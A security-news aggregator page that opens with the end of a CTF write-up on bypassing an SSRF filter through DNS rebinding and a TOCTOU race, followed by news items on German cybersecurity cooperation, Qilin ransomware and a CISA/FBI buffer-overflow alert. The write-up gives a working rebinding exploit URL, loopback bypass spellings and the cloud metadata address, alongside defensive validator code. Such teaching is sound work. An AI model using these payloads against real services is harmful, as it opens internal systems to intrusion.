        return ip2long('127.0.0.0') >> 24 == ip >> 24 or \
               ip2long('10.0.0.0') >> 24 == ip >> 24 or \
               ip2long('172.16.0.0') >> 20 == ip >> 20 or \
               ip2long('192.168.0.0') >> 16 == ip >> 16 or \
               ip2long('0.0.0.0') >> 24 == ip >> 24

    if is_inner_ipaddress(socket.gethostbyname(domain)):
        return flash('IP not allowed', 'danger')

Localhost Protection for /flag. A decorator in util.py ensures that only requests originating from 127.0.0.1, and carrying no Referer header, can reach the /flag endpoint:

    def is_from_localhost(func):
        @functools.wraps(func)
        def check_ip(*args, **kwargs):
            if request.remote_addr != '127.0.0.1' or request.referrer:
                return abort(403)
            return func(*args, **kwargs)
        return check_ip

The route in CachedWeb/web_cached_web/challenge/application/blueprints/routes.py then uses the decorator:

    @web.route('/flag')
    @is_from_localhost
    def flag():
        return send_file('flag.png')

The Vulnerability: DNS Rebinding + TOCTOU

The source code gives a strong hint of what the application is vulnerable to. Despite its safeguards, it suffers from DNS rebinding combined with a Time-of-Check to Time-of-Use (TOCTOU) race condition. Here is why:

Initial DNS Resolution Check. cache_web calls socket.gethostbyname(domain) once, before the URL is handed to Selenium, and checks that the answer is not an internal address.

Separate DNS Resolution by Selenium. When serve_screenshot_from calls driver.get(url), the browser performs its own, independent DNS lookup. An attacker who controls the name’s DNS can answer the first lookup with a public address and the second with 127.0.0.1 or another internal address.

TOCTOU Window. The gap between the check (gethostbyname) and the use (the browser’s request) is the race window. If the DNS record changes inside it, the browser sends its request to 127.0.0.1 and reaches the internal /flag endpoint with a request that genuinely originates from localhost and carries no referrer.

DNS Rebinding Explained (in Simple Terms)

DNS rebinding: an attacker-controlled domain first resolves to one IP address and, once the victim has accepted the domain, changes its answer to a different address, typically an internal one. In browsers the technique is best known as a way around the same-origin policy, because the origin (the domain name) stays the same while the address behind it changes.

TOCTOU Race Condition Explained

TOCTOU (Time-of-Check to Time-of-Use): a condition in which a property is verified at one moment and relied upon at a later one, and the property changes in between, so the system acts on stale or manipulated data. Think of checking that a door is locked before leaving: the check is worthless if someone can unlock the door between your check and your departure. Here the "property" is the DNS answer, and the gap between the application’s check and the browser’s request is the attacker’s window.

Exploitation Steps

Craft a malicious URL: use a DNS rebinding service whose name initially resolves to a harmless public IP but switches to 127.0.0.1 before Selenium fetches the URL.
Bypass the IP check: the lookup in cache_web happens while the name still points at the public address, so the check passes.
Trigger the TOCTOU: by the time Selenium resolves the name it points at the internal target, and the browser fetches the protected /flag endpoint from localhost.
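The check-then-use gap described above, as an added illustration written for this page (it is not code from the challenge). The resolver is a constructed stand-in for a rebinding DNS service; the hostname attacker.example and the `public_answers` knob are assumptions. `vulnerable_cache_web` models the challenge’s two independent lookups, `hardened_cache_web` the fix of resolving once and handing that same address to the fetcher.

```python
import ipaddress
from typing import Callable, Tuple

Resolver = Callable[[str], str]

REBIND_HOST = "attacker.example"   # hypothetical attacker-controlled name (assumption)
PUBLIC_IP = "142.250.195.110"      # the public address the nslookup below returns
INTERNAL_IP = "127.0.0.1"          # where the record is rebound to


def make_rebinding_resolver(public_answers: int = 1) -> Resolver:
    """Constructed stand-in for a rebinding DNS service such as rbndr.us.

    The first `public_answers` lookups of REBIND_HOST answer with PUBLIC_IP,
    every later lookup answers with INTERNAL_IP. A real service alternates at
    random, which is why the post pastes the URL several times; the fixed
    order here is simply the ordering that wins the race.
    """
    state = {"lookups": 0}

    def resolve(hostname: str) -> str:
        if hostname != REBIND_HOST:
            raise LookupError(f"no constructed DNS answer for {hostname!r}")
        state["lookups"] += 1
        return PUBLIC_IP if state["lookups"] <= public_answers else INTERNAL_IP

    return resolve


def is_inner_ipaddress(ip: str) -> bool:
    """The challenge's policy (loopback, RFC 1918, 0.0.0.0/8) plus link-local,
    so that the 169.254.169.254 cloud metadata address is covered as well."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private
            or addr.is_unspecified or addr.is_link_local)


def vulnerable_cache_web(hostname: str, resolve: Resolver) -> str:
    """cache_web as written: one lookup for the check, then the browser looks
    the name up again on its own when it fetches the page."""
    if is_inner_ipaddress(resolve(hostname)):   # time of check
        raise PermissionError("IP not allowed")
    return resolve(hostname)                      # time of use: independent second lookup


def hardened_cache_web(hostname: str, resolve: Resolver) -> Tuple[str, str]:
    """Resolve exactly once, vet that answer, and return (connect_ip, host_header).

    The fetcher must open the TCP connection to connect_ip and send host_header
    as the Host header (and TLS SNI), so the name is never resolved a second time.
    """
    pinned = resolve(hostname)
    if is_inner_ipaddress(pinned):
        raise PermissionError("IP not allowed")
    return pinned, hostname


if __name__ == "__main__":
    print("vulnerable flow fetches from:", vulnerable_cache_web(REBIND_HOST, make_rebinding_resolver()))
    print("hardened flow fetches from:  ", hardened_cache_web(REBIND_HOST, make_rebinding_resolver()))
```

The vulnerable flow passes the check on the public answer and then fetches from 127.0.0.1; the hardened flow fetches from the address it checked. A headless browser driven through Selenium cannot be handed a pinned address this way, since Firefox runs its own resolver, so for that architecture the equivalent control is an egress proxy or network namespace that applies the address policy at connect time, as in the Network Hardening advice later in the post.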
Getting the flag

First we need a public IP address to pair with the loopback address in the rebinding record; Google’s will do. nslookup gives us one:

    ❯ nslookup google.com
    Server:         127.0.0.53
    Address:        127.0.0.53#53

    Non-authoritative answer:
    Name:   google.com
    Address: 142.250.195.110
    Name:   google.com
    Address: 2404:6800:4007:81b::200e

Next we use a rebinding service such as https://lock.cmpxchg8b.com/rebinder.html, which encodes both addresses as hex in a hostname (7f000001 is 127.0.0.1 and 8efac36e is 142.250.195.110) and answers each lookup with one of the two at random. Paste the resulting URL into the challenge’s input box repeatedly until the race goes our way and the flag image comes back. Three attempts are usually enough, but keep going until it works:

    http://7f000001.8efac36e.rbndr.us/flag

The Baby Cached Web challenge shows how even seemingly robust SSRF defences can be undermined by DNS rebinding and a TOCTOU race. By exploiting the gap between the initial DNS check and the browser’s request, an attacker can steer the resolution to an internal endpoint that was meant to be protected, here the secret flag image. It is a reminder that security controls must account for dynamic network behaviour, not just static input validation.

Final Words: Turning Knowledge Into Defense

SSRF isn’t just a vulnerability, it’s a gateway to your internal infrastructure. From bypassing blacklists with 127.1 to weaponising DNS rebinding, we have seen how attackers pivot from simple URL parameters to full-scale breaches.

Key Takeaways:
Always validate and sanitise user-supplied URLs.
Assume localhost restrictions can be bypassed; enforce strict allowlists.
Close the gap between DNS resolution and use in TOCTOU-prone workflows.

To defend against these attacks, the following references are worth reading:
How to prevent SSRF Attacks in Node.js (https://www.youtube.com/@Snyksec)
What functionalities are vulnerable to SSRFs?
Case study of 124 bug bounty reports (https://www.youtube.com/@BugBountyReportsExplained)
https://medium.com/@ajay.monga73/defending-against-ssrf-understanding-detecting-and-mitigating-server-side-request-forgery-f2d1fd62413d (has some good Java code snippets)

To sum up, here are some defences you can start implementing in your web application to stay protected against SSRF.

Input Validation & Sanitization. Validate user-supplied URLs with a schema validation library such as Zod. The schema requires a string that parses as a valid URL and restricts it to HTTPS; anything that is not a well-formed URL, or that uses another scheme such as file:// or ftp://, is rejected.

Implementation:

    const urlSchema = z.string().url().startsWith("https://");
    try {
      urlSchema.parse(userInput);
    } catch (e) {
      blockRequest();
    }

Zod reports invalid input through structured errors, so only URLs with the permitted scheme reach the fetch.

Enforce URL Schemas. The startsWith("https://") check rejects every URL that does not begin with the HTTPS prefix, which shuts out protocol handlers such as file:// that could read local files. Also reject URLs containing encoded control characters such as %0D%0A (CRLF injection), using a pattern match after normalisation.

Domain Allowlisting. Maintain a fixed list of trusted domains, for example "api.unsplash.com", extract URL.hostname and compare it strictly against that list.

Code Example:

    const userHost = new URL(userInput).hostname;
    if (!trustedDomains.includes(userHost)) throw Error("Untrusted domain");

If the set of permitted hosts changes at runtime, back the list with a configuration store such as Consul or a database rather than hard-coding it.

Web Application Firewalls (WAF). Cloud WAFs such as AWS WAF or Cloudflare can inspect incoming requests for URL parameters that point at RFC 1918 ranges, loopback (127.0.0.1) or cloud metadata endpoints (169.254.169.254), and block them.

Rulesets:
A. Block requests whose Host header resolves to an internal IP address.
B. Flag SSRF-looking patterns such as localhost or admin.internal in parameters.
C. Rate-limit URL-fetching endpoints to slow down host and port scanning.

Dependency Management. Integrate Snyk or Dependabot for automated vulnerability scans, so that, for example, an outdated is-url version with a ReDoS flaw is detected and upgraded automatically.

Pipeline Integration:

    # CI/CD step
    snyk test && snyk monitor

Audit libraries that perform network operations for risky defaults such as following redirects, which hands the request to whatever third party the redirect names.

TOCTOU Mitigation. Against DNS rebinding, resolve the domain to an IP address during validation and reuse that same address for the request itself. Keep the resolved address for the lifetime of the request so that an attacker who flips the DNS record after validation gains nothing.

Code Snippet:

    import dns from "node:dns";

    const addresses = await dns.promises.resolve4(userHost);
    if (addresses.some(isInternalIP)) blockRequest();
    // Connect to addresses[0] for the real request, never to a fresh lookup of userHost.
    // Keep the hostname for TLS SNI and the Host header (e.g. via a custom `lookup`
    // option on the HTTP agent) rather than substituting the IP into the URL, which
    // would fail certificate validation and may hit the wrong virtual host.

Network Hardening. Keep backend services such as databases or metadata APIs in separate private subnets that the application server cannot reach.

Egress Controls: restrict outbound traffic from the Node.js process to the necessary domains/IPs with firewall rules (e.g. iptables, cloud security groups).

Ready to test your skills? Work through the labs by hand, and do not underestimate the defensive value of paranoia when designing SSRF protections. Combine curiosity with ethical breaking of systems while building multiple layers of security.
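The Lab 3 bypasses (127.1, 2130706433) and the input-validation advice above come down to one point: the policy has to be applied to the canonical address, not to the string the user typed. What follows is an added example written for this page, not code from the post or from any of the linked references. It normalises IP literals the way the C library’s inet_aton does, unwraps IPv4-mapped IPv6 literals, and reports DNS names as needing the resolve-once step rather than passing them; the URLs in the demo are constructed.

```python
import ipaddress
import socket
from typing import Optional, Union
from urllib.parse import urlsplit

AnyAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

ALLOWED_SCHEMES = {"http", "https"}
STRING_BLOCKLIST = ("localhost", "127.0.0.1")   # the kind of filter Lab 3 gets past


def naive_is_blocked(url: str) -> bool:
    """Substring blocklist: 127.1 and 2130706433 slip straight past it."""
    return any(bad in url.lower() for bad in STRING_BLOCKLIST)


def canonical_address(host: str) -> Optional[AnyAddress]:
    """Return the address an IP-literal host really denotes, or None for a DNS name.

    ipaddress is strict and refuses shorthand, but the C library's inet_aton
    (which curl, browsers and socket.gethostbyname all honour) accepts 127.1,
    plain decimal, octal and hex forms, so those are normalised to dotted-quad
    before the policy is applied. IPv4-mapped IPv6 literals are unwrapped.
    """
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            packed = socket.inet_aton(host)
        except OSError:
            return None   # not an IP literal: resolve it, then re-check every answer
        addr = ipaddress.ip_address(socket.inet_ntoa(packed))
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr


def is_disallowed_address(addr: AnyAddress) -> bool:
    """Loopback, RFC 1918/ULA, link-local (169.254.169.254 metadata), 0/8, multicast, reserved."""
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def classify(url: str) -> str:
    """'blocked' | 'allowed' (public IP literal) | 'needs-resolution' (DNS name).

    'needs-resolution' is not a pass: the caller must resolve the name once,
    run is_disallowed_address over every returned address, and connect to the
    vetted address rather than the name (the TOCTOU point from the challenge).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return "blocked"
    addr = canonical_address(parts.hostname)
    if addr is None:
        return "needs-resolution"
    return "blocked" if is_disallowed_address(addr) else "allowed"


if __name__ == "__main__":
    # Constructed sample inputs: the Lab 3 bypasses, a userinfo trick and a few literals.
    for u in ("http://127.1/admin", "http://2130706433/", "http://user@127.1/",
              "http://[::ffff:127.0.0.1]/", "http://169.254.169.254/latest/meta-data/",
              "https://api.unsplash.com/photos"):
        naive = "blocked" if naive_is_blocked(u) else "passed"
        print(f"{u:45} naive={naive:8} strict={classify(u)}")
```

The naive filter passes every loopback spelling except the literal 127.0.0.1, while the strict check sends all of them to "blocked". Note that "localhost" itself comes back as "needs-resolution": it is a name, and the resolve-once step catches it when the answer is 127.0.0.1.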
by HACKLIDO
2025-02-14 12:07:49
Germany is Strengthening Cybersecurity with Federal-State Collaboration and Digital Violence PreventionBSI Expands Cybersecurity Cooperation with Hamburg Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7 at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees. BSI Vice President Dr. Gerhard Schabhüser stressed the urgency of strengthening cybersecurity across federal and state levels: “In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels.” This partnership is part of a broader federal initiative, with BSI having previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland. These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents. With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany’s cybersecurity resilience, ensuring government agencies, public sector institutions, and critical infrastructure operators have the tools and expertise to prevent, detect, and mitigate cyber threats effectively. 
Addressing Digital Violence Days later, on February 11, BSI hosted “BSI in Dialogue: Cybersecurity and Digital Violence” in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks associated with digital violence in an increasingly interconnected world. While cybercriminals typically operate remotely, digital violence introduces a new layer of cyber threats, where attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes: Unauthorized access to smart home devices for spying, stalking, or harassment. Misuse of digital vulnerabilities to monitor victims or leak personal data. Exploitation of location tracking features to stalk or control individuals. The event initiated several working groups to develop strategic responses to digital violence and was mainly focused on: Defining Digital Violence International research has varied definitions of digital violence, making it difficult to establish a legal and policy framework in Germany. Experts emphasized the need for a standardized definition to develop measurement tools and track digital violence cases more effectively. Technical Support for Victims The WEISSER RING initiative presented concepts for a technical contact point to assist victims. Discussions concluded that victims and advisors need greater technical expertise to counter digital violence effectively. Corporate Responsibility Businesses were encouraged to implement protective policies for employees and integrate security-by-design principles in their products to prevent misuse. Manufacturers and service providers must take accountability for securing digital products against exploitation. Empowerment Through Cybersecurity Education Widespread digital literacy programs can help individuals identify and mitigate digital threats. 
BSI-led initiatives will focus on consumer awareness, IT security training, and response strategies for victims of digital violence. Schabhüser emphasised the human side of cybersecurity at the event: “People can only move safely in a digitalized environment if they recognize the opportunities and risks of digital technologies and can overcome challenges through their own actions.” BSI’s dual efforts in federal-state cybersecurity collaboration and digital violence prevention reflect Germany’s proactive stance against emerging cyber threats. As cybercriminals adapt and evolve their tactics, both government agencies and individual users must be equipped with the knowledge, tools, and policies needed to build digital resilience. Conclusion Through structured cooperation, regulatory frameworks, and public awareness programs, BSI aims to build a secure and cyber-resilient society, ensuring state institutions, businesses, and individuals can operate safely in an increasingly digital world. References: https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2025/250211_Kooperationsvereinbarung_Hamburg.html https://www.bsi.bund.de/DE/Service-Navi/Presse/Alle-Meldungen-News/Meldungen/BSI_Dialog_Cybersicherheit-digitale-Gewalt.html The post Germany is Strengthening Cybersecurity with Federal-State Collaboration and Digital Violence Prevention appeared first on Cyble.
by CYBLE
2025-02-14 12:00:00
Beyond the Basics: Advanced Linux Hardening TechniquesThis guide explores advanced hardening techniques, including MAC frameworks, network security enhancements, proactive vulnerability management, container security, and the use of AI for threat detection.
by ITPro Today
2025-02-14 11:22:17
Qilin Ransomware: Exposing the TTPs Behind One of the Most Active Ransomware Campaigns of 2024Qilin is a ransomware group that emerged in July 2022 and operates under a Ransomware‑as‑a‑Service (RaaS) model. The group quickly gained notoriety following its high‑profile $50 million ransom demand during an assault on Synnovis—a leading pathology services provider—which resulted in significant disruptions across key NHS hospitals in London. Originally an offshoot of the Agenda ransomware (developed in Go), Qilin has evolved into a more robust, Rust‑based variant that incorporates advanced techniques in malware construction and evasion.
by Picus Security
2025-02-14 10:50:28
[POLL] Sam Altman: "I don't do Google searches anymore." How about you?
I'm doing a quick poll because I find myself exactly where Sam is. But I would love to understand how that is for us IT pros here. Hence... a POLL I am hosting at LinkedIn. Deadline is a week from today, Feb 14, 2025. PS: What I mean with "Google searches" is the old-style type words in the box and get blue links, not the new Google AI "zero click" UI that some people get these days... :-D
by KnowBe4
2025-02-14 10:50:00
4 Key Cybersecurity Predictions for 2025 — and What to Do About Them
With cyber breaches reaching record highs in 2024, businesses face increasingly sophisticated threats in 2025 — emphasizing the need for proactive cybersecurity strategies.
by ITPro Today
2025-02-14 10:33:00
PostgreSQL Vulnerability Exploited Alongside BeyondTrust Zero-Day in Targeted Attacks
Threat actors who were behind the exploitation of a zero-day vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products in December 2024 likely also exploited a previously unknown SQL injection flaw in PostgreSQL, according to findings from Rapid7. The vulnerability, tracked as CVE-2025-1094 (CVSS score: 8.1), affects the PostgreSQL interactive tool psql. "An
by The Hacker News
2025-02-14 10:11:29
FBI, CISA Urge Memory-Safe Practices for Software Development
In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to cease unsafe development practices that lead to “unforgivable” buffer overflow vulnerabilities.
“Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist,” the agencies said in the February 12 Secure By Design alert. “For these reasons—as well as the damage exploitation of these defects can cause—CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.”
The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, thus making them a critical point for preventing attacks. We’ll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and use of memory-safe programming languages.
Buffer Overflow Vulnerabilities: Prevalence and Examples
The FBI-CISA guidance specifically mentions the common software weaknesses CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with stack-based buffer overflows (CWE-121) and heap-based buffer overflows (CWE-122). The phrase “buffer overflow” occurs in 67 of the 1270 vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words “buffer” and “overflow” occur in 84 of the KEV vulnerabilities (6.6%).
CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products:
- CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability
- CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3
- CVE-2024-49138, a Windows Common Log File System Driver Elevation of Privilege vulnerability
- CVE-2024-38812, a VMware vCenter Server heap-overflow vulnerability
- CVE-2023-6549, an Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Citrix Systems’ NetScaler ADC and NetScaler Gateway
- CVE-2022-0185, a heap-based buffer overflow flaw in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length (the CWE in this case was CWE-190, Integer Overflow or Wraparound).
“These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution,” the agency guidance said. “Threat actors frequently exploit these vulnerabilities to gain initial access to an organization’s network and then move laterally to the wider network.” They added that “the use of unsafe software development practices that allow the persistence of buffer overflow vulnerabilities—especially the use of memory-unsafe programming languages—poses unacceptable risk to our national and economic security.”
Memory-Safe Software Development
The agencies urged manufacturers “to take immediate action to prevent these vulnerabilities from being introduced into their products. ... Software manufacturer senior executives and business leaders should ask their product and development teams to document past buffer overflow vulnerabilities and how they are working to eliminate this class of defect.”
Customers should hold manufacturers accountable by requesting a Software Bill of Materials (SBOM) and a secure software development attestation, the FBI and CISA said.
For development teams, the agencies recommended the following secure by design practices to prevent buffer overflow vulnerabilities:
- Memory-safe languages should be used whenever possible “to shift the burden of memory management from the developer to the programming language’s built-in safety features.” They added that developers should never disable or override memory safety guarantees in languages when it’s possible to do so, and that using a memory-safe language in one part of a software package will not fix memory-unsafe code in other libraries.
- A phased transition plan for implementing memory-safe languages should be used for upgrading existing codebases while using technologies to limit memory vulnerabilities in existing code. “Ideally, this plan should include using memory-safe languages to develop new code and—over time and when feasible—transition their software’s most highly privileged/exposed code to memory-safe languages,” the agencies said.
- Enable compiler flags that implement compile time and runtime protections against buffer overflows to the extent that application performance allows, and “implement canaries that alert if an overflow occurs.”
- Conduct unit tests with an instrumented toolchain such as AddressSanitizer and MemorySanitizer that checks source code for buffer overflows and other memory safety issues.
- Perform adversarial product testing that includes static analysis, fuzzing, and manual reviews to ensure code safety and quality throughout the development lifecycle.
- Publish a memory-safety roadmap that outlines plans to develop new products with memory-safe languages and to migrate older ones based on risk.
- Conduct root cause analysis of past vulnerabilities, including buffer overflows, to identify patterns. “Where possible, take actions to eliminate entire classes of vulnerabilities across products, rather than the superficial causes,” the agencies said.
The alert said eliminating buffer overflow vulnerabilities “can help reduce the prevalence of other memory safety issues, such as format string, off-by-one, and use-after-free vulnerabilities.”
Conclusion
As an initial entry point for attackers into a network, the importance of buffer overflow vulnerability prevention can’t be overstated. Development teams would be wise to implement CISA and the FBI’s advice to the maximum extent possible. Customers also have a role to play by demanding memory-safe documentation from suppliers. But they also shouldn’t neglect basic cybersecurity practices for the eventual vulnerabilities that will slip past even the most vigilant development teams. Zero trust, risk-based vulnerability management, segmentation, tamper-proof backups and network and endpoint monitoring are all critically important practices for limiting the damage from any cyberattacks that do occur.
by CYBLE
2025-02-14 09:00:00
Cybersecurity Snapshot: CISA Calls for Stamping Out Buffer Overflow Vulnerabilities, as Europol Tells Banks To Prep For Quantum Threat
Check out best practices for preventing buffer overflow attacks. Plus, Europol offers best practices for banks to adopt quantum-resistant cryptography. Meanwhile, an informal Tenable poll looks at cloud security challenges. And get the latest on ransomware trends and on cybercrime legislation and prevention!
Dive into six things that are top of mind for the week ending Feb. 14.
1 - CISA, FBI offer buffer overflow prevention tips
The U.S. government is urging software makers to adopt secure application-development practices that help prevent buffer overflow attacks.
This week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) called buffer overflow vulnerabilities “unforgivable defects” that put national and economic security at risk.
“CISA and FBI urge manufacturers to use proven prevention methods and mitigations to eliminate this class of defect while urging software customers to demand secure products from manufacturers that include these preventions,” the agencies wrote in a joint fact sheet.
Buffer overflows happen when data written to a computer’s memory buffer exceeds the buffer’s capacity. This can lead to issues such as system crashes, data corruption and remote code execution.
These are some of the recommendations the agencies offered for preventing buffer overflows in the fact sheet titled “Malicious Cyber Actors Use Buffer Overflow Vulnerabilities to Compromise Software.”
- Use memory-safe languages when developing software.
- Implement compile time and runtime protections using compiler flags.
- Rigorously test your software products using static analysis, fuzzing and manual reviews throughout the development cycle.
- Analyze the root cause of past buffer overflow vulnerabilities to detect trends and patterns.
CISA and the FBI also highlighted these buffer overflow vulnerabilities:
- CVE-2025-21333
- CVE-2025-0282
- CVE-2024-49138
- CVE-2024-38812
- CVE-2023-6549
- CVE-2022-0185
For more information about buffer overflow attacks and vulnerabilities:
- “Buffer Overflow” (OWASP)
- “What is Buffer Overflow?” (Cybersecurity News)
- “How to mitigate buffer overflow vulnerabilities” (Infosec Institute)
- “How to prevent buffer overflow attacks” (TechTarget)
VIDEOS
- What is a Buffer Overflow Attack? (TechTarget)
- Buffer Overflow Attacks Explained (Tech Sky)
2 - Europol to banks: Prepare for quantum computing threat
Financial institutions in Europe must get ready to face the cyberthreat that quantum computers will pose to data security and data privacy when these powerful systems become widely available.
That’s the message from Europol’s new document “Quantum Safe Financial Forum - A call to action” which urges the European financial sector to prioritize adopting post-quantum cryptography.
Here’s the problem: Quantum computers will be able to decrypt data protected with existing public-key cryptographic algorithms, which is why post-quantum algorithms are being developed, with several already available for use. Estimates about when these quantum computers will be ready range anywhere from five years to 15 years from now. However, the process for organizations to transition towards quantum-resistant cryptography will be lengthy and complicated.
In addition to adopting post-quantum cryptography, banks and other financial institutions should take this opportunity to boost their cryptography management practices, according to Europol.
However, the financial sector won’t be able to go through this journey unassisted. “Achieving this complex goal requires immediate action and a coordinated effort involving industry peers, vendors, policymakers, and society,” the document reads.
Europol recommendations for adopting post-quantum cryptography include:
- To prioritize the shift to quantum-resistant cryptography, banks should update how they manage cryptography; train IT teams on cryptography; and allocate the required resources.
- To update cryptographic management, banks should, for example, integrate this practice into general IT asset management; inventory cryptographic assets; and implement policy compliance checks.
- Banks, governments, vendors and law enforcement agencies must collaborate, coordinate their efforts and share knowledge towards the common goal of securing data against quantum attacks.
- Regulators should refrain from creating new rules and instead focus on collaborating with the private sector on a set of common, consistent guidelines for quantum-safe cryptography.
For more information about the threat from quantum computing:
- “Is Quantum Computing a Cybersecurity Threat?” (American Scientist)
- “Quantum and the Threat to Encryption” (SecurityWeek)
- “Quantum Computing Advances in 2024 Put Security In Spotlight” (Dark Reading)
- “Quantum computing could threaten cybersecurity measures. Here’s why – and how tech firms are responding” (World Economic Forum)
- “Quantum Computing–Quantifying the Current State of the Art to Assess Cybersecurity Threats” (MITRE)
3 - A temperature check on cloud security challenges
During this week’s webinar “How does an industry leader like Tenable protect its own cloud environments?,” we asked attendees about their main cloud security challenges. Check out how they responded.
(Source: 138 webinar attendees polled by Tenable, February 2025)
Interested in learning how Tenable’s security team uses Tenable Cloud Security to safeguard our cloud environments? Watch the on-demand webinar, in which Phillip Hayes, Tenable’s Director of Information Security, and Michael Garman, Tenable’s Senior Manager of Technology Engineering, discuss a variety of cloud security best practices.
For more information about Tenable’s cybersecurity best practices, check out these Tenable blogs:
- “Establishing a Cloud Security Program: Best Practices and Lessons Learned”
- “How To Clean Up Your Cloud Environment Using Tenable Cloud Security”
- “Walking the Walk: How Tenable Embraces Its ‘Secure by Design’ Pledge to CISA”
- “Strengthening the Nessus Software Supply Chain with SLSA”
- “Making Zero Trust Architecture Achievable”
- “Tenable’s Software Update Process Protects Customers’ Business Continuity with a Safe, Do-No-Harm Design”
4 - Google: Curbing cybercrime requires international collaboration
Governments must understand that financially motivated cyberattacks impact not only their specific victims but also endanger national security, and as such merit heightened attention from the public sector.
That’s a key takeaway from “Cybercrime: A Multifaceted National Security Threat,” a report released this week by Google’s Threat Intelligence Group.
Although cybercrime accounts for a majority of malicious cyber activity, it gets short shrift from national security cyber defenders, who instead place most of their focus on state-backed groups, the report states.
“While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions,” the authors wrote. “Financially motivated cyber intrusions, even those without any ties to state goals, harm national security. A single incident can be impactful enough on its own to have a severe consequence on the victim and disrupt citizens' access to critical goods and services,” the report reads.
So how can governments more effectively tackle national-security cyberthreats from profit-seeking cybercriminals? Here are some of Google’s recommendations for government policymakers globally:
- Raise cybercrime to a national security priority, including collecting and analyzing data on cybercrime groups; and boosting law enforcement’s capacity to fight cybercrime.
- Promote adoption of strong cyber defenses across all industries by, for example, incentivizing organizations to adopt security best practices.
- Deploy legal, technical and financial measures to dismantle the infrastructure supporting cybercrime operations.
- Strengthen international collaboration by sharing cyberthreat information, conducting joint investigations and taking coordinated actions against cybercrime networks.
- Enhance efforts to educate individuals and organizations about online safety, cyber best practices and cyber incident reporting.
For more information about cybercrime trends:
- “Insider fraud and AI threats top forecasts of 2025 cybercrime” (American Banker)
- “Cybercrime Tactics and Demands Are Getting More Aggressive” (Bloomberg)
- “3 Cybercrime Trends Tech Pros Must Watch in 2025” (Dice)
- “UN General Assembly adopts milestone cybercrime treaty” (United Nations)
- “Major cybercrime crackdowns signal shift in global cybersecurity strategies” (The Conversation)
5 - Bipartisan U.S. bill seeks tougher punishments for cybercrimes
A bill introduced by two U.S. senators this week would update an existing computer crime law in order to dial up penalties for cybercrime conspiracies.
Currently, the U.S. government charges suspects accused of conspiracies to commit cybercrimes under a general statute, instead of under the Computer Fraud and Abuse Act (CFAA). While the maximum penalty under the general conspiracy statute is five years in prison, the new conspiracy charge that would be added to the CFAA via the “Cyber Conspiracy Modernization Act” could result in jail time ranging between 10 years to life imprisonment.
“The ‘Cyber Conspiracy Modernization Act’ would amend the CFAA to create a specific penalty for the crime of conspiracy under the CFAA,” reads a statement from Sen. Mike Rounds (R-S.D.) who introduced the bill along with Sen. Kirsten Gillibrand (D-N.Y.)
6 - Report: Global ransomware attacks up in 2024
Ransomware attacks grew 15% worldwide last year, compared with 2023, as ransomware gangs showed a growing interest not just in encrypting data but in stealing it to further monetize it.
That’s according to NCC Group’s “Cyber Threat Intelligence Annual Report 2024,” which also found that the industrials sector was the hardest hit, suffering 27% of ransomware attacks, a sign of ransomware groups' focus on critical infrastructure organizations.
A trend that developed last year was the increasing interest among ransomware gangs on swiping data, not just locking it up in exchange for payment. Why? Stealing data is “faster, easier and more profitable,” according to NCC Group.
“Stolen information can be leveraged for extortion, fraud, identity theft, or even future breaches, making it a highly valuable commodity in the hands of cybercriminals,” reads the report.
The 5,263 ransomware attacks observed by NCC Group in 2024 were the most since it started monitoring them in 2021. Despite getting hit by law enforcement operations, LockBit ranked first among ransomware groups with 10% of all attacks, followed by RansomHub.
For more information about ransomware:
- “Ransomware: Predictions and Actions in 2025” (SC Magazine)
- “Stop Ransomware Guide” (CISA)
- “New ransomware group Funksec is quickly gaining traction” (CSO)
- “Ransomware isn't always about the money: Government spies have objectives, too” (The Register)
- “How ransomware attacks like Columbus' happen” (Axios)
by Tenable
2025-02-14 08:00:00
Gartner: CISOs struggling to balance security, business objectives
by ComputerWeekly
